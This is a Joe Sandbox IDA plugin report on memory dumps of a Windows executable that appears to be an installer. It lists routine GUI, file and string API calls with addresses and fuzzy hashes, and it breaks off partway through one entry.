• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
• Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
• Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E766
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
• GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
• Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
• Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
• Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
• Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
• Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
• Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
• Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
• Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
• Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                      APIs
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                      • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                      • API String ID: 2573145106-3235461205
                                                                                                      • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                      • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                      • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                      • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                      • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                      • API String ID: 3478007392-2498399450
                                                                                                      • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                      • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                      • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                      • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                      APIs
                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                      • API String ID: 1782028327-3855017861
                                                                                                      • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                      • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                      • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                      • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                      APIs
                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                      • SaveDC.GDI32(?), ref: 00416C83
                                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                      • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808407030-0
                                                                                                      • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                      • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                      • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                      • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                      • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                      • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                      • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                      • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                      • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                      • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                      • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 1095203571-0
                                                                                                      • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                      • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                      • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                      • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                      Strings
                                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                      • API String ID: 1452528299-4018462623
                                                                                                      • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                      • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                      • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                      • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                      • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                      APIs
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                      • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$RealizeSelect$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 2261976640-0
                                                                                                      • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                      • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                      • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                      • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                        • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                        • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                        • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                      • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                        • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
